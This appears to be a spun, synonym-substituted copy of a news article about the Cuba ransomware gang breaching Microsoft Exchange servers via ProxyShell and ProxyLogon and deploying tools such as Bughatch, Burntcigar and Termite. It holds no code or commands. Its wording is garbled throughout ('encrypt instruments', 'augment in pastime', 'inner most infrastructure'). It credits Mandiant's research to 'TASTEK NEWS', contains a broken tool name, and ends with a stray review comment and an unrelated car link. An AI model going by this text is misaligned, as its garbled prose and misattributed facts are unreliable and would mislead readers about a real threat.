Notes

Microsoft Exchange servers hacked to deploy Cuba ransomware
The Cuba ransomware operation is exploiting Microsoft Exchange vulnerabilities to gain preliminary access to company networks and encrypt instruments. Cybersecurity firm Mandiant tracks the ransomware gang as UNC2596 and the ransomware itself as COLDDRAW. However, the ransomware is more frequently referred to as Cuba, which is how BleepingComputer will reference them across this article. Cuba is a ransomware operation that launched at the tip of 2019, and while they started slow, they began to pick up speed in 2020 and 2021. This augment in pastime led to the FBI issuing a Cuba ransomware advisory in December 2021, caution that the crowd breached 49 essential infrastructure organizations in the U.


S. In TASTEK NEWS by Mandiant, researchers show that the Cuba operation basically targets america, followed by Canada. The Cuba ransomware gang was seen leveraging Microsoft Exchange vulnerabilities to deploy web shells, RATs, and backdoors to establish their foothold on the target network since August 2021. "Mandiant has also identified the exploitation of Microsoft Exchange vulnerabilities, including ProxyShell and ProxyLogon, as an alternate access point leveraged by UNC2596 likely as early as August 2021," explains Mandiant in a new report. The planted backdoors include Cobalt Strike or the NetSupport Manager remote access tool, but the group also uses their own ‘Bughatch’, ‘Wedgecut’, and ‘eck. exe”, and Burntcigar’ tools.


Wedgecut comes in the variety of an executable named “check. exe,” which is a reconnaissance tool that enumerates the Active Directory through PowerShell. Bughatch is a downloader that fetches PowerShell scripts and files from the CandC server. To evade detection, it loads in memory from a remote URL. Burntcigar is a utility that can terminate strategies at the kernel level by exploiting a flaw in an Avast driver, that's protected with the tool for a “bring your own vulnerable driver” attack.


Finally, there’s a memory only dropper that fetches the above payloads and loads them, called Termite. However, this tool has been observed in campaigns of varied threat groups, so it’s not used exclusively by the Cuba threat actors. The threat actors enhance privileges using stolen account credentials sourced throughout the with no trouble available Mimikatz and Wicker tools. Then they carry out community reconnaissance with Wedgecut, and next, they move laterally with RDP, SMB, PsExec, and Cobalt Strike. The next deployment is Bughatch loaded by Termite, followed by Burntcigar, which lays the bottom for data exfiltration and file encryption by deactivating defense tools. The Cuba gang doesn’t use any cloud amenities for the exfiltration step but instead sends everything onto their own inner most infrastructure.


Back in May 2021, Cuba ransomware partnered with the spam operators of the Hancitor malware to gain access to company networks through DocuSign phishing emails. Since then, Cuba has evolved its operations to focus on public facing facilities vulnerabilities, comparable to the Microsoft Exchange ProxyShell and ProxyLogon vulnerabilities. This shift makes the attacks stronger but also easier to thwart, as safety updates that plug the exploited issues have been accessible for many months now. The Cuba operation will likely turn its attention to other vulnerabilities once there are not more helpful goals operating unpatched Microsoft Exchange servers. TASTEK NEWS implies that applying the available safeguard updates as soon as the program vendors unencumber them is key in keeping up a powerful security stance in opposition t even essentially the most advanced threat actors. TASTEK to refer to this as Cuba, reads terribly in areas of the item.


Otherwise the content is well put in combination.

Website: https://tastek.net/nissan-titan-warrior-will-arrive-in-2021/